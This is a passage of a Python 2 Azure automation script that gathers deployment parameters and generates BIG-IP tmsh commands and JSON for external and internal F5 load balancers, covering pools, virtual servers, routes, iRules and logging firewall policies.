subscription_id=os.environ['AZURE_SUBSCRIPTION_ID']
credentials = ServicePrincipalCredentials(
client_id=os.environ['AZURE_CLIENT_ID'],
secret=os.environ['AZURE_SECRET'],
tenant=os.environ['AZURE_TENANT'],
cloud_environment=mycloud
)
resource_group = os.environ['AZURE_RESOURCE_GROUP']
f5_ext_resource_group = "%s_F5_External" %(resource_group)
f5_int_resource_group = "%s_F5_Internal" %(resource_group)
resource_client = ResourceManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
compute_client = ComputeManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
network_client = NetworkManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
if USE_OMS:
loganalytics_client = LogAnalyticsManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
parameters = None
f5_password = os.environ['f5_password']
f5_unique_short_name = os.environ['f5_unique_short_name']
f5_unique_short_name2 = os.environ['f5_unique_short_name2']
f5_license_key_1 = os.environ['f5_license_key_1']
f5_license_key_2 = os.environ['f5_license_key_2']
f5_license_key_3 = os.environ['f5_license_key_3']
f5_license_key_4 = os.environ['f5_license_key_4']
client_id=os.environ['AZURE_CLIENT_ID']
client_secret=os.environ['AZURE_SECRET']
tenant_id=os.environ['AZURE_TENANT']
cloud_environment=mycloud
for deployment in resource_client.deployments.list_by_resource_group(resource_group):
# if deployment.name != 'Microsoft.Template':
# continue
# data = deployment.as_dict()
# print deployment.name
# print data
if "f5_Ext_Untrusted_SubnetName" not in deployment.properties.parameters.keys():
continue
deployment.properties.parameters
parameters = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in parameters.items():
if v and subnet_re.search(v):
parameters[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
parameters[k] = IPAddress(v)
if options.debug:
pprint.pprint(parameters)
jumphost_ip = get_ips(resource_group, parameters['vdssJumpBoxName'])[0]
jumphostlinux_ip = get_ips(resource_group, parameters['vdssJumpBoxLinuxName'])[0]
mgmt_start_ip = IPAddress(parameters['management_SubnetPrefix'].first+10)
#if not resource_client.resource_groups.check_existence(f5_ext_resource_group):
if options.action == "external":
ext_parameters = {
"adminUsername": parameters['vdssJumpBoxAdminUserName'],
"adminPassword": f5_password,
"dnsLabel": f5_unique_short_name,
"instanceName": f5_unique_short_name,
"imageName":"Best",
"licensedBandwidth":"25m-best-hourly",
"bigIpVersion":"latest",
"licenseKey1": f5_license_key_1,
"licenseKey2": f5_license_key_2,
"numberOfExternalIps": 0,
"vnetName": parameters['vnetName'],
"vnetResourceGroupName": resource_group,
"mgmtSubnetName": parameters['management_SubnetName'],
"mgmtIpAddressRangeStart": str(mgmt_start_ip + 1),
"externalSubnetName": parameters['f5_Ext_Untrusted_SubnetName'],
"externalIpSelfAddressRangeStart": str(parameters['f5_Ext_Untrusted_IP'] - 3),
"externalIpAddressRangeStart": str(parameters['f5_Ext_Untrusted_IP'] - 1),
"internalSubnetName": parameters['f5_Ext_Trusted_SubnetName'],
"internalIpAddressRangeStart": str(parameters['f5_Ext_Trusted_IP'] - 1),
"tenantId": tenant_id,
"clientId": client_id,
"servicePrincipalSecret": client_secret,
"managedRoutes": "0.0.0.0/0",
"routeTableTag": "%sRouteTag" %(f5_unique_short_name),
"ntpServer": "0.pool.ntp.org",
"timeZone": "UTC",
"restrictedSrcAddress": "*",
"allowUsageAnalytics": "No"
}
send_parameters = {k: {'value': v} for k, v in ext_parameters.items()}
print json.dumps(send_parameters)
sys.exit(0)
if options.action == "internal":
# deployment_properties)
int_parameters = {
"adminUsername": parameters['vdssJumpBoxAdminUserName'],
"adminPassword": f5_password,
"dnsLabel": f5_unique_short_name2,
"instanceName": f5_unique_short_name2,
"imageName":"Best",
"licensedBandwidth":"25m-best-hourly",
"bigIpVersion":"latest",
"licenseKey1": f5_license_key_3,
"licenseKey2": f5_license_key_4,
"numberOfExternalIps": 0,
"vnetName": parameters['vnetName'],
"vnetResourceGroupName": resource_group,
"mgmtSubnetName": parameters['management_SubnetName'],
"mgmtIpAddressRangeStart": str(mgmt_start_ip + 3),
"externalSubnetName": parameters['f5_Int_Untrusted_SubnetName'],
"externalIpSelfAddressRangeStart": str(parameters['f5_Int_Untrusted_IP'] - 3),
"externalIpAddressRangeStart": str(parameters['f5_Int_Untrusted_IP'] - 1),
"internalSubnetName": parameters['f5_Int_Trusted_SubnetName'],
"internalIpAddressRangeStart": str(parameters['f5_Int_Trusted_IP'] - 1),
"tenantId": tenant_id,
"clientId": client_id,
"servicePrincipalSecret": client_secret,
"managedRoutes": "0.0.0.0/0,%s,%s,%s,%s,10.0.0.0/22" %(str(parameters['management_SubnetPrefix']),
str(parameters['vdmS_SubnetPrefix']),
parameters['f5_Ext_Untrusted_SubnetPrefix'],
parameters['f5_Ext_Trusted_SubnetPrefix']),
"routeTableTag": "%sRouteTag" %(f5_unique_short_name2),
"ntpServer": "0.pool.ntp.org",
"timeZone": "UTC",
"restrictedSrcAddress": "*",
"allowUsageAnalytics": "No"
}
send_parameters = {k: {'value': v} for k, v in int_parameters.items()}
print json.dumps(send_parameters)
sys.exit(0)
f5_ext = None
waiting = True
while waiting:
for deployment in resource_client.deployments.list_by_resource_group(f5_ext_resource_group):
data = deployment.as_dict()
if 'externalIpSelfAddressRangeStart' not in deployment.properties.parameters:
continue
# print data['name']
# print data['properties']['provisioning_state']
# print data['properties'].keys()
# print deployment.properties.parameters
if data['properties']['provisioning_state'] == 'Running':
#if data['properties']['provisioning_state'] == 'Succeeded':
waiting = True
else:
waiting = False
f5_ext = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in f5_ext.items():
if not isinstance(v,str):
continue
if v and subnet_re.search(v):
f5_ext[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
f5_ext[k] = IPAddress(v)
if waiting:
# print 'waiting'
time.sleep(30)
#pprint.pprint(f5_ext)
if options.debug:
pprint.pprint(f5_ext)
if not resource_client.resource_groups.check_existence(f5_int_resource_group):
sys.exit(0)
f5_int = None
waiting = True
while waiting:
for deployment in resource_client.deployments.list_by_resource_group(f5_int_resource_group):
if 'externalIpSelfAddressRangeStart' not in deployment.properties.parameters:
continue
data = deployment.as_dict()
deployment.properties.parameters
if data['properties']['provisioning_state'] == 'Running':
#if data['properties']['provisioning_state'] == 'Succeeded':
waiting = True
else:
waiting = False
f5_int = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in f5_int.items():
if not isinstance(v,str):
continue
if v and subnet_re.search(v):
f5_int[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
f5_int[k] = IPAddress(v)
if waiting:
# print 'waiting'
time.sleep(30)
if options.debug:
pprint.pprint(f5_int)
#print "az vm show --name %s --resource-group \"%s\" -d --query \"privateIps\" -d" %(parameters['jumpBoxName'],resource_group)
vm = compute_client.virtual_machines.get(resource_group, parameters['vdssJumpBoxName'],expand='instanceview')
nic = vm.network_profile.network_interfaces[0].id.split('/')[-1]
jumphost_ip = IPAddress(network_client.network_interfaces.get(resource_group,nic).ip_configurations[0].private_ip_address)
(bigip_ext1_ip, bigip_ext1_pip, bigip_ext1_fqdn) = get_ips(f5_ext_resource_group, "%s-%s0" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext2_ip, bigip_ext2_pip, bigip_ext2_fqdn) = get_ips(f5_ext_resource_group, "%s-%s1" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
# no pip
if not bigip_ext1_pip:
bigip_ext1_pip = bigip_ext1_ip
if not bigip_ext2_pip:
bigip_ext2_pip = bigip_ext2_ip
(bigip_int1_ip, bigip_int1_pip, bigip_int1_fqdn) = get_ips(f5_int_resource_group, "%s-%s0" %(f5_int['dnsLabel'], f5_int['instanceName']))
(bigip_int2_ip, bigip_int2_pip, bigip_int2_fqdn) = get_ips(f5_int_resource_group, "%s-%s1" %(f5_int['dnsLabel'], f5_int['instanceName']))
if not bigip_int1_pip:
bigip_int1_pip = bigip_int1_ip
if not bigip_int2_pip:
bigip_int2_pip = bigip_int2_ip
(bigip_ext_ext1_ip, bigip_ext_ext1_pip) = get_ext_ips(f5_ext_resource_group, "%s-%s0" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext_ext2_ip, bigip_ext_ext2_pip) = get_ext_ips(f5_ext_resource_group, "%s-%s1" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext_int1_ip, bigip_ext_int1_pip) = get_ext_ips(f5_int_resource_group, "%s-%s0" %(f5_int['dnsLabel'], f5_int['instanceName']))
(bigip_ext_int2_ip, bigip_ext_int2_pip) = get_ext_ips(f5_int_resource_group, "%s-%s1" %(f5_int['dnsLabel'], f5_int['instanceName']))
#bigip_ext1 = IPAddress(parameters['management_SubnetPrefix'].first+10)
#bigip_ext2 = IPAddress(parameters['management_SubnetPrefix'].first+11)
#bigip_int1 = IPAddress(parameters['management_SubnetPrefix'].first+12)
#bigip_int2 = IPAddress(parameters['management_SubnetPrefix'].first+13)
external_pip = get_pip(resource_group, "f5-ext-pip0")
external_pip2 = get_pip(resource_group, "f5-ext-pip1")
#print external_pip
# add 2 for now, needs to be fixed
#external_vip = parameters['f5_Ext_Untrusted_IP']
external_vip = str(external_pip[0])
external_vip2 = str(external_pip2[0])
subnet = network_client.subnets.get(resource_group,str(f5_ext["vnetName"]),str(f5_ext["externalSubnetName"]))
subnet.id
internalsubnet = network_client.subnets.get(resource_group,str(f5_int["vnetName"]),str(f5_int["externalSubnetName"]))
internalsubnet.id
#internal_vip = parameters['f5_Int_Untrusted_IP']
internal_ext_gw = IPAddress(parameters['f5_Int_Untrusted_SubnetPrefix'].first+1)
internal_ext_gw = IPAddress(parameters['f5_Int_Untrusted_SubnetPrefix'].first+1)
output = {}
pools = []
pool_members = []
virtuals = []
if options.debug:
print "### EXTERNAL F5 ###"
print "# Routes"
print "create /net route mgmt network %s gw %s" %(parameters['management_SubnetPrefix'], IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1))
print "create /net route vdms network %s gw %s" %(parameters['vdmS_SubnetPrefix'], IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1))
print "# MGMT Hosts"
print "create /ltm pool jumpbox_rdp_pool members replace-all-with { %s:3389}" %(jumphost_ip)
print "create /ltm pool jumpbox_rdp_pool members replace-all-with { %s:22}" %(jumphostlinux_ip)
# print "create /ltm virtual jumpbox_rdp_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(external_vip)
print "create /ltm virtual jumpbox_rdp_local_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(bigip_ext_ext1_ip)
print "create /ltm virtual jumpbox_rdp_local_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(bigip_ext_ext2_ip)
print "create /ltm pool bigip_ext1_ssh_pool members replace-all-with { %s:22}" %(bigip_ext1_ip)
print "create /ltm pool bigip_ext2_ssh_pool members replace-all-with { %s:22}" %(bigip_ext2_ip)
print "create /ltm pool bigip_int1_ssh_pool members replace-all-with { %s:22}" %(bigip_int1_ip)
print "create /ltm pool bigip_int2_ssh_pool members replace-all-with { %s:22}" %(bigip_int2_ip)
routes= [{ 'name': 'mgmt',
'destination': str(parameters['management_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'vdms',
'destination': str(parameters['vdmS_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'internalvips',
'destination': str(parameters['f5_Int_Trusted_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private10',
'destination': '10.0.0.0/8',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private172',
'destination': '172.16.0.0/12',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private192',
'destination': '192.168.0.0/16',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) }
]
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_rdp_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_rdp_pool',
'host': str(jumphost_ip),
'name': str(jumphost_ip),
'port': '3389'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_rdp_gw_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_rdp_gw_pool',
'host': str(jumphost_ip),
'name': str(jumphost_ip),
'port': '443'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_ssh_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'http_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'http_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '80'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'https_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'https_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '443'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'ssl_visible_http_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'ssl_visible_http_pool',
'host': str(parameters['f5_Int_Untrusted_IP']),
'name': str(parameters['f5_Int_Untrusted_IP']),
'port': '80'})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_rdp_vs',
'command': "create /ltm virtual jumpbox_rdp_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_ssh_vs',
'command': "create /ltm virtual jumpbox_ssh_vs destination %s:22 profiles replace-all-with { loose_fastL4 } pool jumpbox_ssh_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_rdp_gw_vs',
'command': "create /ltm virtual jumpbox_rdp_gw_vs destination %s:443 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_gw_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'http_vs',
'command': "create /ltm virtual http_vs destination %s:80 profiles replace-all-with { http } pool http_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'ssl_visible_vs',
'command': "create /ltm virtual ssl_visible_vs destination %s:443 profiles replace-all-with { clientssl http } pool ssl_visible_http_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'ssl_not_visible_vs',
'command': "create /ltm virtual ssl_not_visible_vs destination %s:8443 profiles replace-all-with { loose_fastL4 } pool https_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'float_is_alive_vs',
'command': "create /ltm virtual float_is_alive_vs destination %s:80 profiles replace-all-with { http } rules { is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Ext_Untrusted_IP']), LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_ext1_ip), LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext2_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_ext2_ip), LOG_PROFILE)})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_ext1_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_ext1_ssh_pool',
'host': str(bigip_ext1_ip),
'name': str(bigip_ext1_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_ext2_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_ext2_ssh_pool',
'host': str(bigip_ext2_ip),
'name': str(bigip_ext2_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_int1_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_int1_ssh_pool',
'host': str(bigip_int1_ip),
'name': str(bigip_int1_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'bigip_int2_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'bigip_int2_ssh_pool',
'host': str(bigip_int2_ip),
'name': str(bigip_int2_ip),
'port': '22'})
#print "create /ltm pool external_snat_pool members replace-all-with { %s:0}" %(external_vip)
if options.debug:
print "create /ltm virtual bigip1_ext1_ssh_vs destination %s:2200 profiles replace-all-with { loose_fastL4 } pool bigip_ext1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext2_ssh_vs destination %s:2201 profiles replace-all-with { loose_fastL4 } pool bigip_ext2_ssh_pool translate-address disabled translate-port disabled fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext3_ssh_vs destination %s:2202 profiles replace-all-with { loose_fastL4 } pool bigip_ext3_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
print "create /ltm virtual bigip1_ext4_ssh_vs destination %s:2203 profiles replace-all-with { loose_fastL4 } pool bigip_ext4_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_ext1_ssh_vs',
# 'command': "create /ltm virtual bigip1_ext1_ssh_vs destination %s:2200 profiles replace-all-with { loose_fastL4 } pool bigip_ext1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_ext2_ssh_vs',
# 'command': "create /ltm virtual bigip1_ext2_ssh_vs destination %s:2201 profiles replace-all-with { loose_fastL4 } pool bigip_ext2_ssh_pool translate-address disabled translate-port disabled fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_int1_ssh_vs',
# 'command': "create /ltm virtual bigip1_int1_ssh_vs destination %s:2202 profiles replace-all-with { loose_fastL4 } pool bigip_int1_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
# virtuals.append({'server': str(bigip_ext1_pip),
# 'name':'bigip_int2_ssh_vs',
# 'command': "create /ltm virtual bigip1_int2_ssh_vs destination %s:2203 profiles replace-all-with { loose_fastL4 } pool bigip_int2_ssh_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(external_vip)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'mgmt_outbound_vs',
'command':"create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'vdms_outbound_vs',
'command':"create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'mo_outbound_vs',
'command':"create /ltm virtual mo_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source 10.0.0.0/8 profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(LOG_PROFILE) })
if options.debug:
print "create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)
print "create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } ip-forward fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s } source-address-translation { type automap }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)
if options.action == "external_setup":
if USE_OMS:
ws = loganalytics_client.workspaces.get(resource_group,'oms-logs')
keys = loganalytics_client.workspaces.get_shared_keys(resource_group,'oms-logs')
output['oms'] = [{'customer_id':ws.customer_id,
'key':keys.primary_shared_key,
'server':str(bigip_ext1_pip)}]
else:
output['oms'] = []
# output['iapps'] = [{'template_file':
# 'template_params':
# 'server':str(bigip_ext1_pip)}]
output['server1'] = str(bigip_ext1_pip)
output['server2'] = str(bigip_ext2_pip)
output['routes'] = routes
output['pools'] = pools
output['pool_members'] = pool_members
output['virtuals'] = virtuals
modules = []
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_ext1_pip)})
modules.append({'module':'afm',
'level':'nominal',
'server':str(bigip_ext2_pip)})
output['modules'] = modules
output['irules'] = [{'name':'is_alive',
'content': "when HTTP_REQUEST {\n HTTP::respond 200 content \"OK\"\n}\n",
'server':str(bigip_ext1_pip)},
{'name':'virtual_is_alive',
'content': "when CLIENT_ACCEPTED {\n virtual float_is_alive_vs\n}\n",
'server':str(bigip_ext1_pip)}]
commands = []
commands.append({'check':'tmsh list /ltm profile fastl4 loose_fastL4',
'command':'tmsh create /ltm profile fastl4 loose_fastL4 defaults-from fastL4 loose-close enabled loose-initialization enabled idle-timeout 300 reset-on-timeout disabled',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /security log profile local-afm-log',
'command':'tmsh create /security log profile local-afm-log { network replace-all-with { local-afm-log { publisher local-db-publisher filter { log-acl-match-accept enabled log-acl-match-drop enabled log-acl-match-reject enabled } } } }',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /security firewall policy log_all_afm',
'command':'tmsh create /security firewall policy log_all_afm rules add { allow_all { action accept log yes place-before first } deny_all { action reject log yes place-after allow_all }}',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address 0.0.0.0',
'command':'create /ltm virtual-address 0.0.0.0 traffic-group none',
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(external_vip),
'command':'create /ltm virtual-address %s traffic-group none' %(external_vip),
'server':str(bigip_ext1_pip)})
commands.append({'check':'tmsh list /ltm virtual-address %s' %(external_vip2),
'command':'create /ltm virtual-address %s traffic-group none' %(external_vip2),
'server':str(bigip_ext1_pip)})
output['commands'] = commands
# print json.dumps(output)
# sys.exit(0)
if options.debug:
print "\n\n### INTERNAL F5 ###"
# print "create /net self self_2nic_float address %s/%s vlan external traffic-group traffic-group-1" %(internal_vip,parameters['f5_Int_Untrusted_SubnetPrefix'].prefixlen)
print "create /ltm pool ext_gw_pool members replace-all-with { %s:0}" %(internal_ext_gw)
print "create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(parameters['management_SubnetPrefix'])
print "create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { local-afm-log }" %(parameters['vdmS_SubnetPrefix'])
if options.action == "internal_setup":
output = {}
if USE_OMS:
ws = loganalytics_client.workspaces.get(resource_group,'oms-logs')
keys = loganalytics_client.workspaces.get_shared_keys(resource_group,'oms-logs')
output['oms'] = [{'customer_id':ws.customer_id,
'key':keys.primary_shared_key,
'server':str(bigip_int1_pip)}]
else:
output['oms'] = []
output['server1'] = str(bigip_int1_pip)
output['server2'] = str(bigip_int2_pip)
output['http_iapps'] = [{'logging': LOG_PROFILE,
'server':str(bigip_int1_pip)}]
virtuals = []
pools = []
pool_members = []
output['irules'] = [{'name':'is_alive',
'content': "when HTTP_REQUEST {\n HTTP::respond 200 content \"OK\"\n}\n",
'server':str(bigip_int1_pip)},
{'name':'virtual_is_alive',
'content': "when CLIENT_ACCEPTED {\n virtual float_is_alive_vs\n}\n",
'server':str(bigip_int1_pip)}]
pools.append({'server': str(bigip_int1_pip),
'name': 'ext_gw_pool',
'partition':'Common'})
pools.append({'server': str(bigip_int1_pip),
'name': 'https_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_int1_pip),
'pool': 'ext_gw_pool',
'host': str(internal_ext_gw),
'name': str(internal_ext_gw),
'port': '0'})
pool_members.append({'server': str(bigip_int1_pip),
'pool': 'https_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '443'})
virtuals.append({'server': str(bigip_int1_pip),
'name':'mgmt_outbound_vs',
'command':"create /ltm virtual mgmt_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(parameters['management_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'vdms_outbound_vs',
'command':"create /ltm virtual vdms_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source %s profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(parameters['vdmS_SubnetPrefix'], LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'mo_outbound_vs',
'command':"create /ltm virtual mo_outbound_vs destination 0.0.0.0:0 mask 0.0.0.0 source 10.0.0.0/8 profiles replace-all-with { loose_fastL4 } pool ext_gw_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(LOG_PROFILE) })
virtuals.append({'server': str(bigip_int1_pip),
'name':'forward_vs',
'command':"create /ltm virtual forward_vs destination 0.0.0.0:0 mask 0.0.0.0 profiles replace-all-with { loose_fastL4 } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(LOG_PROFILE) })
# virtuals.append({'server': str(bigip_int1_pip),
# 'name':'http_vs',
# 'command':"create /ltm virtual http_vs destination %s:80 profiles replace-all-with { http serverssl } pool https_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Int_Untrusted_IP']), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'float_is_alive_vs',
'command': "create /ltm virtual float_is_alive_vs destination %s:9999 profiles replace-all-with { http } rules { is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(parameters['f5_Int_Untrusted_IP']-1), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int1_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_int1_ip), LOG_PROFILE)})
virtuals.append({'server': str(bigip_int2_pip),
'name':'is_alive_vs',
'command': "create /ltm virtual is_alive_vs destination %s:80 profiles replace-all-with { http } rules { virtual_is_alive } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(str(bigip_ext_int2_ip), LOG_PROFILE)})
# output['selfips'] = [{'name': 'self_2nic_float',
# 'address': str(internal_vip),
# 'netmask': str(parameters['f5_Int_Untrusted_SubnetPrefix'].netmask),
# 'vlan': 'external',
# 'traffic_group':'traffic-group-1',
# 'server': str(bigip_int1_pip),
# }]
output['selfips'] = []
output['pools'] = pools
output['pool_members'] = pool_members
output['virtuals'] = virtuals
routes= [
{ 'name': 'default',
'destination': 'default',
'gateway_address': str(IPAddress(parameters['f5_Int_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_int1_pip) },
{ 'name': 'exttrusted',
